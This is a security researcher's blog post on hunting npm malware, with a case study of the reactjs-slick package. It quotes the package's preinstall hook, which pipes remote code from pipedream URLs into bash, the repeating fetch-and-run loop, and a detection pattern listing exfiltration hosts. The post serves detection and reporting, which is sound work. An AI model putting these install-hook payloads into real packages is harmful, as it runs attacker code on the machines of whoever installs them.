Hunting for malware in npm

I've spent the past two years or so hunting for malware in open source ecosystems (mostly npm and PyPI, but a bit in the others too). We've found and reported over 20,000 instances in that time, and while we're certainly not the only group to be doing this work, I'm proud of how quickly we're able to detect and report.

In this post, I wanted to share some details about how I discover these and what I do about them. I'm only going to talk about one specific malware type, which is among the most basic. There have been previous write-ups about these, so there's nothing "new" in this post that you can't learn elsewhere.

How Malware Executes

When you install a package from npm, the package has an opportunity to run "preinstall" scripts. These are arbitrary commands, defined in package.json, that run either before, during, or after installation. (There are a few others; check out the docs for more information.)

Since these preinstall scripts can do pretty much anything, they're a simple source for malware. Attackers can exfiltrate data, install other packages, make changes to your system, or anything else that the user running the script would be able to do, including connecting to other network endpoints.

Detecting Preinstall Malware

The simplest way to detect this type of malware is to look for it in package.json files. You can download the package (being careful not to install it -- oss-download can be helpful here) and then use jq or another command to search for commands in the file.

Case Study: pkg:npm/reactjs-slick

For this post, we're going to explore the reactjs-slick module, which was posted a few hours ago.

# oss-download -e pkg:npm/reactjs-slick

   ____   _____ _____    _____           _            _
  / __ \ / ____/ ____|  / ____|         | |          | |
 | |  | | (___| (___   | |  __  __ _  __| | __ _  ___| |_
 | |  | |\___ \\___ \  | | |_ |/ _` |/ _` |/ _` |/ _ \ __|
 | |__| |____) |___) | | |__| | (_| | (_| | (_| |  __/ |_
  \____/|_____/_____/   \_____|\__,_|\__,_|\__, |\___|\__|
                                            __/ |
                                           |___/          
OSS Gadget - oss-download 0.1.357+c946c93324 - github.com/Microsoft/OSSGadget
INFO  - Downloaded pkg:npm/reactjs-slick to /tmp/t/npm-reactjs-slick@2.0.2

# find . -name package.json | xargs jq .scripts.preinstall                                                                                                                                                      
"curl https://d621fdf07c471f049aba6ce202295bea.m.pipedream.net | bash"

So here, we're seeing that when the reactjs-slick module is installed, the curl command is used to download a command from that long URL and pass it to bash.

This is effectively a reverse shell, allowing the attacker to run arbitrary commands on your system.

If we load that URL (being very careful), we see it ends up running this command:

watch -n 10 'curl https://3513c0f0392eb1c8690450709ee37093.m.pipedream.net | bash'; node index.js;

So every 10 seconds, that other URL is loaded and executed:

touch /tmp/redparsecdhackediwasheredone

OSS Gadget: oss-detect-backdoor

My team and I packaged up a bunch of suspicious patterns into a tool, part of the OSS Gadget suite. You can use this to automatically download and scan for interesting patterns. In this case of the reactjs-slick module, we detect it easily:

# oss-detect-backdoor pkg:npm/reactjs-slick

   ____   _____ _____    _____           _            _
  / __ \ / ____/ ____|  / ____|         | |          | |
 | |  | | (___| (___   | |  __  __ _  __| | __ _  ___| |_
 | |  | |\___ \\___ \  | | |_ |/ _` |/ _` |/ _` |/ _ \ __|
 | |__| |____) |___) | | |__| | (_| | (_| | (_| |  __/ |_
  \____/|_____/_____/   \_____|\__,_|\__,_|\__, |\___|\__|
                                            __/ |
                                           |___/          
OSS Gadget - oss-detect-backdoor 0.1.365+570ffa6632 - github.com/Microsoft/OSSGadget
--[ Match #1 of 7 ]--
   Rule Id: BD001002
       Tag: Security.DependencyConfusion.AttackPattern.SuspiciousHostname
  Severity: Critical, Confidence: High
  Filename: /npm-reactjs-slick@2.0/package/index.js
   Pattern: .{1,45}\.(pipedream\.net|ceye\.io|burpcollaborator\.net|interact\.sh|requestbin\.net|nmnfbb\.com)
  | });
  | 
  | var options = {
  |     hostname: "d621fdf07c471f049aba6ce202295bea.m.pipedream.net", //replace burpcollaborator.net wit
  |     port: 443,
  |     path: "/",
  |     method: "POST",
  | 

Attacker or Security Researcher?

In many cases, the "attacker" is a security researcher, doing this either as part of a penetration test or to demonstrate an attack's effectiveness.

In this case, the module was published by someone with a few others, that all appear to be similar ("r3dpars3c was doing pentest here").

Of course, nothing stops an actual attacker from writing the same thing, so I don't differentiate between what I believe to be a real attack and a simulated one.

Reporting the Module

We can easily report these types of modules. Within npm, you can click on the "Report malware" button on the right side of the module's page.

In this particular case, the author's other packages had similar malware, so we reported all four to the npm security team, and all have since been removed from the registry.